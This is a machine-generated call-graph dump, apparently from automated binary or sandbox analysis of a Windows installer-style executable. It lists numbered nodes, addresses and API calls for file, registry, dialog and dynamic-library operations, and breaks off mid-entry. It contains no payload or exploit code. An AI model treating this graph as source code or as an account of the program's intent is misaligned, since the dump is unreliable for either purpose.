4387->4388 4412 405e7c GetFileAttributesW CreateFileW 4388->4412 4390 402e8c 4391 402f35 4390->4391 4392 402e98 GlobalAlloc 4390->4392 4395 4062cf 11 API calls 4391->4395 4393 402eb1 4392->4393 4394 402f2c CloseHandle 4392->4394 4413 403368 SetFilePointer 4393->4413 4394->4391 4397 402f45 4395->4397 4399 402f50 DeleteFileW 4397->4399 4400 402f63 4397->4400 4398 402eb7 4401 403336 ReadFile 4398->4401 4399->4400 4414 401435 4400->4414 4403 402ec0 GlobalAlloc 4401->4403 4404 402ed0 4403->4404 4405 402f04 WriteFile GlobalFree 4403->4405 4407 40337f 33 API calls 4404->4407 4406 40337f 33 API calls 4405->4406 4408 402f29 4406->4408 4411 402edd 4407->4411 4408->4394 4410 402efb GlobalFree 4410->4405 4411->4410 4412->4390 4413->4398 4415 404f9e 25 API calls 4414->4415 4416 401443 4415->4416 4417 401cd5 4418 401446 18 API calls 4417->4418 4419 401cdd 4418->4419 4420 401446 18 API calls 4419->4420 4421 401ce8 4420->4421 4422 40145c 18 API calls 4421->4422 4423 401cf1 4422->4423 4424 401d07 lstrlenW 4423->4424 4425 401d43 4423->4425 4426 401d11 4424->4426 4426->4425 4430 406035 lstrcpynW 4426->4430 4428 401d2c 4428->4425 4429 401d39 lstrlenW 4428->4429 4429->4425 4430->4428 4431 402cd7 4432 401446 18 API calls 4431->4432 4434 402c64 4432->4434 4433 402d17 ReadFile 4433->4434 4434->4431 4434->4433 4435 402d99 4434->4435 4436 402dd8 4437 4030e3 4436->4437 4438 402ddf 4436->4438 4439 402de5 FindClose 4438->4439 4439->4437 4440 401d5c 4441 40145c 18 API calls 4440->4441 4442 401d63 4441->4442 4443 40145c 18 API calls 4442->4443 4444 401d6c 4443->4444 4445 401d73 lstrcmpiW 4444->4445 4446 401d86 lstrcmpW 4444->4446 4447 401d79 4445->4447 4446->4447 4448 401c99 4446->4448 4447->4446 4447->4448 4449 4027e3 4450 4027e9 4449->4450 4451 4027f2 4450->4451 4452 402836 4450->4452 4465 401553 4451->4465 4453 40145c 18 API calls 4452->4453 4455 40283d 4453->4455 4457 4062cf 11 API calls 4455->4457 4456 4027f9 4458 40145c 18 API calls 4456->4458 4462 401a13 4456->4462 4459 40284d 4457->4459 4460 40280a RegDeleteValueW 4458->4460 4469 40149d RegOpenKeyExW 4459->4469 4461 4062cf 11 API calls 4460->4461 4464 40282a RegCloseKey 4461->4464 4464->4462 4466 401563 4465->4466 4467 40145c 18 API calls 4466->4467 4468 401589 RegOpenKeyExW 4467->4468 4468->4456 4472 4014c9 4469->4472 4477 401515 4469->4477 4470 4014ef RegEnumKeyW 4471 401501 RegCloseKey 4470->4471 4470->4472 4474 406328 3 API calls 4471->4474 4472->4470 4472->4471 4473 401526 RegCloseKey 4472->4473 4475 40149d 3 API calls 4472->4475 4473->4477 4476 401511 4474->4476 4475->4472 4476->4477 4478 401541 RegDeleteKeyW 4476->4478 4477->4462 4478->4477 4479 4040e4 4480 4040ff 4479->4480 4486 40422d 4479->4486 4482 40413a 4480->4482 4510 403ff6 WideCharToMultiByte 4480->4510 4481 404298 4483 40436a 4481->4483 4484 4042a2 GetDlgItem 4481->4484 4490 403d6b 19 API calls 4482->4490 4491 403df6 8 API calls 4483->4491 4487 40432b 4484->4487 4488 4042bc 4484->4488 4486->4481 4486->4483 4489 404267 GetDlgItem SendMessageW 4486->4489 4487->4483 4492 40433d 4487->4492 4488->4487 4496 4042e2 6 API calls 4488->4496 4515 403db1 KiUserCallbackDispatcher 4489->4515 4494 40417a 4490->4494 4495 404365 4491->4495 4497 404353 4492->4497 4498 404343 SendMessageW 4492->4498 4500 403d6b 19 API calls 4494->4500 4496->4487 4497->4495 4501 404359 SendMessageW 4497->4501 4498->4497 4499 404293 4502 403d8d SendMessageW 4499->4502 4503 404187 CheckDlgButton 4500->4503 4501->4495 4502->4481 4513 403db1 KiUserCallbackDispatcher 4503->4513 4505 4041a5 GetDlgItem 4514 403dc4 SendMessageW 4505->4514 4507 4041bb SendMessageW 4508 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4507->4508 4509 4041d8 GetSysColor 4507->4509 4508->4495 4509->4508 4511 404033 4510->4511 4512 404015 GlobalAlloc WideCharToMultiByte 4510->4512 4511->4482 4512->4511 4513->4505 4514->4507 4515->4499 4516 402ae4 4517 402aeb 4516->4517 4518 4030e3 4516->4518 4519 402af2 CloseHandle 4517->4519 4519->4518 4520 402065 4521 401446 18 API calls 4520->4521 4522 40206d 4521->4522 4523 401446 18 API calls 4522->4523 4524 402076 GetDlgItem 4523->4524 4525 4030dc 4524->4525 4526 4030e3 4525->4526 4528 405f7d wsprintfW 4525->4528 4528->4526 4529 402665 4530 40145c 18 API calls 4529->4530 4531 40266b 4530->4531 4532 40145c 18 API calls 4531->4532 4533 402674 4532->4533 4534 40145c 18 API calls 4533->4534 4535 40267d 4534->4535 4536 4062cf 11 API calls 4535->4536 4537 40268c 4536->4537 4538 406301 2 API calls 4537->4538 4539 402695 4538->4539 4540 4026a6 lstrlenW lstrlenW 4539->4540 4542 404f9e 25 API calls 4539->4542 4544 4030e3 4539->4544 4541 404f9e 25 API calls 4540->4541 4543 4026e8 SHFileOperationW 4541->4543 4542->4539 4543->4539 4543->4544 4545 401c69 4546 40145c 18 API calls 4545->4546 4547 401c70 4546->4547 4548 4062cf 11 API calls 4547->4548 4549 401c80 4548->4549 4550 405ccc MessageBoxIndirectW 4549->4550 4551 401a13 4550->4551 4552 402f6e 4553 402f72 4552->4553 4554 402fae 4552->4554 4556 4062cf 11 API calls 4553->4556 4555 40145c 18 API calls 4554->4555 4562 402f9d 4555->4562 4557 402f7d 4556->4557 4558 4062cf 11 API calls 4557->4558 4559 402f90 4558->4559 4560 402fa2 4559->4560 4561 402f98 4559->4561 4564 406113 9 API calls 4560->4564 4563 403ea0 5 API calls 4561->4563 4563->4562 4564->4562 4565 4023f0 4566 402403 4565->4566 4567 4024da 4565->4567 4568 40145c 18 API calls 4566->4568 4569 404f9e 25 API calls 4567->4569 4570 40240a 4568->4570 4573 4024f1 4569->4573 4571 40145c 18 API calls 4570->4571 4572 402413 4571->4572 4574 402429 LoadLibraryExW 4572->4574 4575 40241b GetModuleHandleW 4572->4575 4576 4024ce 4574->4576 4577 40243e 4574->4577 4575->4574 4575->4577 4579 404f9e 25 API calls 4576->4579 4589 406391 GlobalAlloc WideCharToMultiByte 4577->4589 4579->4567 4580 402449 4581 40248c 4580->4581 4582 40244f 4580->4582 4583 404f9e 25 API calls 4581->4583 4584 401435 25 API calls 4582->4584 4587 40245f 4582->4587 4585 402496 4583->4585 4584->4587 4586 4062cf 11 API calls 4585->4586 4586->4587 4587->4573 4588 4024c0 FreeLibrary 4587->4588 4588->4573 4590 4063c9 GlobalFree 4589->4590 4591 4063bc GetProcAddress 4589->4591 4590->4580 4591->4590 3431 402175 3432 401446 18 API calls 3431->3432 3433 40217c 3432->3433 3434 401446 18 API calls 3433->3434 3435 402186 3434->3435 3436 402197 3435->3436 3439 4062cf 11 API calls 3435->3439 3437 4021aa EnableWindow 3436->3437 3438 40219f ShowWindow 3436->3438 3440 4030e3 3437->3440 3438->3440 3439->3436 4592 4048f8 4593 404906 4592->4593 4594 40491d 4592->4594 4595 40490c 4593->4595 4610 404986 4593->4610 4596 40492b IsWindowVisible 4594->4596 4602 404942 4594->4602 4597 403ddb SendMessageW 4595->4597 4599 404938 4596->4599 4596->4610 4600 404916 4597->4600 4598 40498c CallWindowProcW 4598->4600 4611 40487a SendMessageW 4599->4611 4602->4598 4616 406035 lstrcpynW 4602->4616 4604 404971 4617 405f7d wsprintfW 4604->4617 4606 404978 4607 40141d 80 API calls 4606->4607 4608 40497f 4607->4608 4618 406035 lstrcpynW 4608->4618 4610->4598 4612 4048d7 SendMessageW 4611->4612 4613 40489d GetMessagePos ScreenToClient SendMessageW 4611->4613 4615 4048cf 4612->4615 4614 4048d4 4613->4614 4613->4615 4614->4612 4615->4602 4616->4604 4617->4606 4618->4610 3733 4050f9 3734 4052c1 3733->3734 3735 40511a GetDlgItem GetDlgItem GetDlgItem 3733->3735 3736 4052f2 3734->3736 3737 4052ca GetDlgItem CreateThread CloseHandle 3734->3737 3782 403dc4 SendMessageW 3735->3782 3739 405320 3736->3739 3741 405342 3736->3741 3742 40530c ShowWindow ShowWindow 3736->3742 3737->3736 3785 405073 OleInitialize 3737->3785 3743 40537e 3739->3743 3745 405331 3739->3745 3746 405357 ShowWindow 3739->3746 3740 40518e 3752 406831 18 API calls 3740->3752 3747 403df6 8 API calls 3741->3747 3784 403dc4 SendMessageW 3742->3784 3743->3741 3748 405389 SendMessageW 3743->3748 3749 403d44 SendMessageW 3745->3749 3750 405377 3746->3750 3751 405369 3746->3751 3757 4052ba 3747->3757 3756 4053a2 CreatePopupMenu 3748->3756 3748->3757 3749->3741 3755 403d44 SendMessageW 3750->3755 3753 404f9e 25 API calls 3751->3753 3754 4051ad 3752->3754 3753->3750 3758 4062cf 11 API calls 3754->3758 3755->3743 3759 406831 18 API calls 3756->3759 3760 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3758->3760 3761 4053b2 AppendMenuW 3759->3761 3762 405203 SendMessageW SendMessageW 3760->3762 3763 40521f 3760->3763 3764 4053c5 GetWindowRect 3761->3764 3765 4053d8 3761->3765 3762->3763 3766 405232 3763->3766 3767 405224 SendMessageW 3763->3767 3768 4053df TrackPopupMenu 3764->3768 3765->3768 3769 403d6b 19 API calls 3766->3769 3767->3766 3768->3757 3770 4053fd 3768->3770 3771 405242 3769->3771 3772 405419 SendMessageW 3770->3772 3773 40524b ShowWindow 3771->3773 3774 40527f GetDlgItem SendMessageW 3771->3774 3772->3772 3775 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3772->3775 3776 405261 ShowWindow 3773->3776 3777 40526e 3773->3777 3774->3757 3778 4052a2 SendMessageW SendMessageW 3774->3778 3779 40545b SendMessageW 3775->3779 3776->3777 3783 403dc4 SendMessageW 3777->3783 3778->3757 3779->3779 3780 405486 GlobalUnlock SetClipboardData CloseClipboard 3779->3780 3780->3757 3782->3740 3783->3774 3784->3739 3786 403ddb SendMessageW 3785->3786 3790 405096 3786->3790 3787 403ddb SendMessageW 3788 4050d1 OleUninitialize 3787->3788 3789 4062cf 11 API calls 3789->3790 3790->3789 3791 40139d 80 API calls 3790->3791 3792 4050c1 3790->3792 3791->3790 3792->3787 4619 4020f9 GetDC GetDeviceCaps 4620 401446 18 API calls 4619->4620 4621 402116 MulDiv 4620->4621 4622 401446 18 API calls 4621->4622 4623 40212c 4622->4623 4624 406831 18 API calls 4623->4624 4625 402165 CreateFontIndirectW 4624->4625 4626 4030dc 4625->4626 4627 4030e3 4626->4627 4629 405f7d wsprintfW 4626->4629 4629->4627 4630 4024fb 4631 40145c 18 API calls 4630->4631 4632 402502 4631->4632 4633 40145c 18 API calls 4632->4633 4634 40250c 4633->4634 4635 40145c 18 API calls 4634->4635 4636 402515 4635->4636 4637 40145c 18 API calls 4636->4637 4638 40251f 4637->4638 4639 40145c 18 API calls 4638->4639 4640 402529 4639->4640 4641 40253d 4640->4641 4642 40145c 18 API calls 4640->4642 4643 4062cf 11 API calls 4641->4643 4642->4641 4644 40256a CoCreateInstance 4643->4644 4645 40258c 4644->4645 4646 4026fc 4648 402708 4646->4648 4649 401ee4 4646->4649 4647 406831 18 API calls 4647->4649 4649->4646 4649->4647 3793 4019fd 3794 40145c 18 API calls 3793->3794 3795 401a04 3794->3795 3798 405eab 3795->3798 3799 405eb8 GetTickCount GetTempFileNameW 3798->3799 3800 401a0b 3799->3800 3801 405eee 3799->3801 3801->3799 3801->3800 4650 4022fd 4651 40145c 18 API calls 4650->4651 4652 402304 GetFileVersionInfoSizeW 4651->4652 4653 4030e3 4652->4653 4654 40232b GlobalAlloc 4652->4654 4654->4653 4655 40233f GetFileVersionInfoW 4654->4655 4656 402350 VerQueryValueW 4655->4656 4657 402381 GlobalFree 4655->4657 4656->4657 4658 402369 4656->4658 4657->4653 4663 405f7d wsprintfW 4658->4663 4661 402375 4664 405f7d wsprintfW 4661->4664 4663->4661 4664->4657 4665 402afd 4666 40145c 18 API calls 4665->4666 4667 402b04 4666->4667 4672 405e7c GetFileAttributesW CreateFileW 4667->4672 4669 402b10 4670 4030e3 4669->4670 4673 405f7d wsprintfW 4669->4673 4672->4669 4673->4670 4674 4029ff 4675 401553 19 API calls 4674->4675 4676 402a09 4675->4676 4677 40145c 18 API calls 4676->4677 4678 402a12 4677->4678 4679 402a1f RegQueryValueExW 4678->4679 4683 401a13 4678->4683 4680 402a45 4679->4680 4681 402a3f 4679->4681 4682 4029e4 RegCloseKey 4680->4682 4680->4683 4681->4680 4685 405f7d wsprintfW 4681->4685 4682->4683 4685->4680 4686 401000 4687 401037 BeginPaint GetClientRect 4686->4687 4688 40100c DefWindowProcW 4686->4688 4690 4010fc 4687->4690 4691 401182 4688->4691 4692 401073 CreateBrushIndirect FillRect DeleteObject 4690->4692 4693 401105 4690->4693 4692->4690 4694 401170 EndPaint 4693->4694 4695 40110b CreateFontIndirectW 4693->4695 4694->4691 4695->4694 4696 40111b 6 API calls 4695->4696 4696->4694 4697 401f80 4698 401446 18 API calls 4697->4698 4699 401f88 4698->4699 4700 401446 18 API calls 4699->4700 4701 401f93 4700->4701 4702 401fa3 4701->4702 4703 40145c 18 API calls 4701->4703 4704 401fb3 4702->4704 4705 40145c 18 API calls 4702->4705 4703->4702 4706 402006 4704->4706 4707 401fbc 4704->4707 4705->4704 4708 40145c 18 API calls 4706->4708 4709 401446 18 API calls 4707->4709 4710 40200d 4708->4710 4711 401fc4 4709->4711 4713 40145c 18 API calls 4710->4713 4712 401446 18 API calls 4711->4712 4714 401fce 4712->4714 4715 402016 FindWindowExW 4713->4715 4716 401ff6 SendMessageW 4714->4716 4717 401fd8 SendMessageTimeoutW 4714->4717 4719 402036 4715->4719 4716->4719 4717->4719 4718 4030e3 4719->4718 4721 405f7d wsprintfW 4719->4721 4721->4718 4722 402880 4723 402884 4722->4723 4724 40145c 18 API calls 4723->4724 4725 4028a7 4724->4725 4726 40145c 18 API calls 4725->4726 4727 4028b1 4726->4727 4728 4028ba RegCreateKeyExW 4727->4728 4729 4028e8 4728->4729 4734 4029ef 4728->4734 4730 402934 4729->4730 4732 40145c 18 API calls 4729->4732 4731 402963 4730->4731 4733 401446 18 API calls 4730->4733 4735 4029ae RegSetValueExW 4731->4735 4738 40337f 33 API calls 4731->4738 4736 4028fc lstrlenW 4732->4736 4737 402947 4733->4737 4741 4029c6 RegCloseKey 4735->4741 4742 4029cb 4735->4742 4739 402918 4736->4739 4740 40292a 4736->4740 4744 4062cf 11 API calls 4737->4744 4745 40297b 4738->4745 4746 4062cf 11 API calls 4739->4746 4747 4062cf 11 API calls 4740->4747 4741->4734 4743 4062cf 11 API calls 4742->4743 4743->4741 4744->4731 4753 406250 4745->4753 4750 402922 4746->4750 4747->4730 4750->4735 4752 4062cf 11 API calls 4752->4750 4754 406273 4753->4754 4755 4062b6 4754->4755 4756 406288 wsprintfW 4754->4756 4757 402991 4755->4757 4758 4062bf lstrcatW 4755->4758 4756->4755 4756->4756 4757->4752 4758->4757 4759 403d02 4760 403d0d 4759->4760 4761 403d11 4760->4761 4762 403d14 GlobalAlloc 4760->4762 4762->4761 4763 402082 4764 401446 18 API calls 4763->4764 4765 402093 SetWindowLongW 4764->4765 4766 4030e3 4765->4766 4767 402a84 4768 401553 19 API calls 4767->4768 4769 402a8e 4768->4769 4770 401446 18 API calls 4769->4770 4771 402a98 4770->4771 4772 401a13 4771->4772 4773 402ab2 RegEnumKeyW 4771->4773 4774 402abe RegEnumValueW 4771->4774 4775 402a7e 4773->4775 4774->4772 4774->4775 4775->4772 4776 4029e4 RegCloseKey 4775->4776 4776->4772 4777 402c8a 4778 402ca2 4777->4778 4779 402c8f 4777->4779 4781 40145c 18 API calls 4778->4781 4780 401446 18 API calls 4779->4780 4783 402c97 4780->4783 4782 402ca9 lstrlenW 4781->4782 4782->4783 4784 401a13 4783->4784 4785 402ccb WriteFile 4783->4785 4785->4784 4786 401d8e 4787 40145c 18 API calls 4786->4787 4788 401d95 ExpandEnvironmentStringsW 4787->4788 4789 401da8 4788->4789 4790 401db9 4788->4790 4789->4790 4791 401dad lstrcmpW 4789->4791 4791->4790 4792 401e0f 4793 401446 18 API calls 4792->4793 4794 401e17 4793->4794 4795 401446 18 API calls 4794->4795 4796 401e21 4795->4796 4797 4030e3 4796->4797 4799 405f7d wsprintfW 4796->4799 4799->4797 4800 40438f 4801 4043c8 4800->4801 4802 40439f 4800->4802 4803 403df6 8 API calls 4801->4803 4804 403d6b 19 API calls 4802->4804 4806 4043d4 4803->4806 4805 4043ac SetDlgItemTextW 4804->4805 4805->4801 4807 403f90 4808 403fa0 4807->4808 4809 403fbc 4807->4809 4818 405cb0 GetDlgItemTextW 4808->4818 4811 403fc2 SHGetPathFromIDListW 4809->4811 4812 403fef 4809->4812 4814 403fd2 4811->4814 4817 403fd9 SendMessageW 4811->4817 4813 403fad SendMessageW 4813->4809 4815 40141d 80 API calls 4814->4815 4815->4817 4817->4812 4818->4813 4819 402392 4820 40145c 18 API calls 4819->4820 4821 402399 4820->4821 4824 407224 4821->4824 4825 406efe 25 API calls 4824->4825 4826 407244 4825->4826 4827 4023a7 4826->4827 4828 40724e lstrcpynW lstrcmpW 4826->4828 4829 407280 4828->4829 4830 407286 lstrcpynW 4828->4830 4829->4830 4830->4827 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4831 402797 4832 40145c 18 API calls 4831->4832 4833 4027ae 4832->4833 4834 40145c 18 API calls 4833->4834 4835 4027b7 4834->4835 4836 40145c 18 API calls 4835->4836 4837 4027c0 GetPrivateProfileStringW lstrcmpW 4836->4837 4838 401e9a 4839 40145c 18 API calls 4838->4839 4840 401ea1 4839->4840 4841 401446 18 API calls 4840->4841 4842 401eab wsprintfW 4841->4842 3802 401a1f 3803 40145c 18 API calls 3802->3803 3804 401a26 3803->3804 3805 4062cf 11 API calls 3804->3805 3806 401a49 3805->3806 3807 401a64 3806->3807 3808 401a5c 3806->3808 3877 406035 lstrcpynW 3807->3877 3876 406035 lstrcpynW 3808->3876 3811 401a6f 3878 40674e lstrlenW CharPrevW 3811->3878 3812 401a62 3815 406064 5 API calls 3812->3815 3846 401a81 3815->3846 3816 406301 2 API calls 3816->3846 3819 401a98 CompareFileTime 3819->3846 3820 401ba9 3821 404f9e 25 API calls 3820->3821 3823 401bb3 3821->3823 3822 401b5d 3824 404f9e 25 API calls 3822->3824 3855 40337f 3823->3855 3826 401b70 3824->3826 3830 4062cf 11 API calls 3826->3830 3828 406035 lstrcpynW 3828->3846 3829 4062cf 11 API calls 3831 401bda 3829->3831 3835 401b8b 3830->3835 3832 401be9 SetFileTime 3831->3832 3833 401bf8 CloseHandle 3831->3833 3832->3833 3833->3835 3836 401c09 3833->3836 3834 406831 18 API calls 3834->3846 3837 401c21 3836->3837 3838 401c0e 3836->3838 3839 406831 18 API calls 3837->3839 3840 406831 18 API calls 3838->3840 3841 401c29 3839->3841 3843 401c16 lstrcatW 3840->3843 3844 4062cf 11 API calls 3841->3844 3843->3841 3847 401c34 3844->3847 3845 401b50 3849 401b93 3845->3849 3850 401b53 3845->3850 3846->3816 3846->3819 3846->3820 3846->3822 3846->3828 3846->3834 3846->3845 3848 4062cf 11 API calls 3846->3848 3854 405e7c GetFileAttributesW CreateFileW 3846->3854 3881 405e5c GetFileAttributesW 3846->3881 3884 405ccc 3846->3884 3851 405ccc MessageBoxIndirectW 3847->3851 3848->3846 3852 4062cf 11 API calls 3849->3852 3853 4062cf 11 API calls 3850->3853 3851->3835 3852->3835 3853->3822 3854->3846 3856 40339a 3855->3856 3857 4033c7 3856->3857 3890 403368 SetFilePointer 3856->3890 3888 403336 ReadFile 3857->3888 3861 401bc6 3861->3829 3862 403546 3864 40354a 3862->3864 3865 40356e 3862->3865 3863 4033eb GetTickCount 3863->3861 3868 403438 3863->3868 3866 403336 ReadFile 3864->3866 3865->3861 3869 403336 ReadFile 3865->3869 3870 40358d WriteFile 3865->3870 3866->3861 3867 403336 ReadFile 3867->3868 3868->3861 3868->3867 3872 40348a GetTickCount 3868->3872 3873 4034af MulDiv wsprintfW 3868->3873 3875 4034f3 WriteFile 3868->3875 3869->3865 3870->3861 3871 4035a1 3870->3871 3871->3861 3871->3865 3872->3868 3874 404f9e 25 API calls 3873->3874 3874->3868 3875->3861 3875->3868 3876->3812 3877->3811 3879 401a75 lstrcatW 3878->3879 3880 40676b lstrcatW 3878->3880 3879->3812 3880->3879 3882 405e79 3881->3882 3883 405e6b SetFileAttributesW 3881->3883 3882->3846 3883->3882 3885 405ce1 3884->3885 3886 405d2f 3885->3886 3887 405cf7 MessageBoxIndirectW 3885->3887 3886->3846 3887->3886 3889 403357 3888->3889 3889->3861 3889->3862 3889->3863 3890->3857 4843 40209f GetDlgItem GetClientRect 4844 40145c 18 API calls 4843->4844 4845 4020cf LoadImageW SendMessageW 4844->4845 4846 4030e3 4845->4846 4847 4020ed DeleteObject 4845->4847 4847->4846 4848 402b9f 4849 401446 18 API calls 4848->4849 4853 402ba7 4849->4853 4850 402c4a 4851 402bdf ReadFile 4851->4853 4860 402c3d 4851->4860 4852 401446 18 API calls 4852->4860 4853->4850 4853->4851 4854 402c06 MultiByteToWideChar 4853->4854 4855 402c3f 4853->4855 4856 402c4f 4853->4856 4853->4860 4854->4853 4854->4856 4861 405f7d wsprintfW 4855->4861 4858 402c6b SetFilePointer 4856->4858 4856->4860 4858->4860 4859 402d17 ReadFile 4859->4860 4860->4850 4860->4852 4860->4859 4861->4850 3417 402b23 GlobalAlloc 3418 402b39 3417->3418 3419 402b4b 3417->3419 3428 401446 3418->3428 3421 40145c 18 API calls 3419->3421 3422 402b52 WideCharToMultiByte lstrlenA 3421->3422 3423 402b41 3422->3423 3424 402b84 WriteFile 3423->3424 3425 402b93 3423->3425 3424->3425 3426 402384 GlobalFree 3424->3426 3426->3425 3429 406831 18 API calls 3428->3429 3430 401455 3429->3430 3430->3423 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3441 4054a5 3442 4055f9 3441->3442 3443 4054bd 3441->3443 3445 40564a 3442->3445 3446 40560a GetDlgItem GetDlgItem 3442->3446 3443->3442 3444 4054c9 3443->3444 3448 4054d4 SetWindowPos 3444->3448 3449 4054e7 3444->3449 3447 4056a4 3445->3447 3455 40139d 80 API calls 3445->3455 3450 403d6b 19 API calls 3446->3450 3456 4055f4 3447->3456 3511 403ddb 3447->3511 3448->3449 3452 405504 3449->3452 3453 4054ec ShowWindow 3449->3453 3454 405634 SetClassLongW 3450->3454 3457 405526 3452->3457 3458 40550c DestroyWindow 3452->3458 3453->3452 3459 40141d 80 API calls 3454->3459 3462 40567c 3455->3462 3460 40552b SetWindowLongW 3457->3460 3461 40553c 3457->3461 3463 405908 3458->3463 3459->3445 3460->3456 3464 4055e5 3461->3464 3465 405548 GetDlgItem 3461->3465 3462->3447 3466 405680 SendMessageW 3462->3466 3463->3456 3472 405939 ShowWindow 3463->3472 3531 403df6 3464->3531 3469 405578 3465->3469 3470 40555b SendMessageW IsWindowEnabled 3465->3470 3466->3456 3467 40141d 80 API calls 3480 4056b6 3467->3480 3468 40590a DestroyWindow KiUserCallbackDispatcher 3468->3463 3474 405585 3469->3474 3477 4055cc SendMessageW 3469->3477 3478 405598 3469->3478 3486 40557d 3469->3486 3470->3456 3470->3469 3472->3456 3473 406831 18 API calls 3473->3480 3474->3477 3474->3486 3476 403d6b 19 API calls 3476->3480 3477->3464 3481 4055a0 3478->3481 3482 4055b5 3478->3482 3479 4055b3 3479->3464 3480->3456 3480->3467 3480->3468 3480->3473 3480->3476 3502 40584a DestroyWindow 3480->3502 3514 403d6b 3480->3514 3525 40141d 3481->3525 3483 40141d 80 API calls 3482->3483 3485 4055bc 3483->3485 3485->3464 3485->3486 3528 403d44 3486->3528 3488 405731 GetDlgItem 3489 405746 3488->3489 3490 40574f ShowWindow KiUserCallbackDispatcher 3488->3490 3489->3490 3517 403db1 KiUserCallbackDispatcher 3490->3517 3492 405779 EnableWindow 3495 40578d 3492->3495 3493 405792 GetSystemMenu EnableMenuItem SendMessageW 3494 4057c2 SendMessageW 3493->3494 3493->3495 3494->3495 3495->3493 3518 403dc4 SendMessageW 3495->3518 3519 406035 lstrcpynW 3495->3519 3498 4057f0 lstrlenW 3499 406831 18 API calls 3498->3499 3500 405806 SetWindowTextW 3499->3500 3520 40139d 3500->3520 3502->3463 3503 405864 CreateDialogParamW 3502->3503 3503->3463 3504 405897 3503->3504 3505 403d6b 19 API calls 3504->3505 3506 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3505->3506 3507 40139d 80 API calls 3506->3507 3508 4058e8 3507->3508 3508->3456 3509 4058f0 ShowWindow 3508->3509 3510 403ddb SendMessageW 3509->3510 3510->3463 3512 403df3 3511->3512 3513 403de4 SendMessageW 3511->3513 3512->3480 3513->3512 3515 406831 18 API calls 3514->3515 3516 403d76 SetDlgItemTextW 3515->3516 3516->3488 3517->3492 3518->3495 3519->3498 3523 4013a4 3520->3523 3521 401410 3521->3480 3523->3521 3524 4013dd MulDiv SendMessageW 3523->3524 3545 4015a0 3523->3545 3524->3523 3526 40139d 80 API calls 3525->3526 3527 401432 3526->3527 3527->3486 3529 403d51 SendMessageW 3528->3529 3530 403d4b 3528->3530 3529->3479 3530->3529 3532 403e0b GetWindowLongW 3531->3532 3542 403e94 3531->3542 3533 403e1c 3532->3533 3532->3542 3534 403e2b GetSysColor 3533->3534 3535 403e2e 3533->3535 3534->3535 3536 403e34 SetTextColor 3535->3536 3537 403e3e SetBkMode 3535->3537 3536->3537 3538 403e56 GetSysColor 3537->3538 3539 403e5c 3537->3539 3538->3539 3540 403e63 SetBkColor 3539->3540 3541 403e6d 3539->3541 3540->3541 3541->3542 3543 403e80 DeleteObject 3541->3543 3544 403e87 CreateBrushIndirect 3541->3544 3542->3456 3543->3544 3544->3542 3546 4015fa 3545->3546 3625 40160c 3545->3625 3547 401601 3546->3547 3548 401742 3546->3548 3549 401962 3546->3549 3550 4019ca 3546->3550 3551 40176e 3546->3551 3552 401650 3546->3552 3553 4017b1 3546->3553 3554 401672 3546->3554 3555 401693 3546->3555 3556 401616 3546->3556 3557 4016d6 3546->3557 3558 401736 3546->3558 3559 401897 3546->3559 3560 4018db 3546->3560 3561 40163c 3546->3561 3562 4016bd 3546->3562 3546->3625 3571 4062cf 11 API calls 3547->3571 3563 401751 ShowWindow 3548->3563 3564 401758 3548->3564 3568 40145c 18 API calls 3549->3568 3575 40145c 18 API calls 3550->3575 3565 40145c 18 API calls 3551->3565 3589 4062cf 11 API calls 3552->3589 3569 40145c 18 API calls 3553->3569 3566 40145c 18 API calls 3554->3566 3570 401446 18 API calls 3555->3570 3574 40145c 18 API calls 3556->3574 3588 401446 18 API calls 3557->3588 3557->3625 3558->3625 3679 405f7d wsprintfW 3558->3679 3567 40145c 18 API calls 3559->3567 3572 40145c 18 API calls 3560->3572 3576 401647 PostQuitMessage 3561->3576 3561->3625 3573 4062cf 11 API 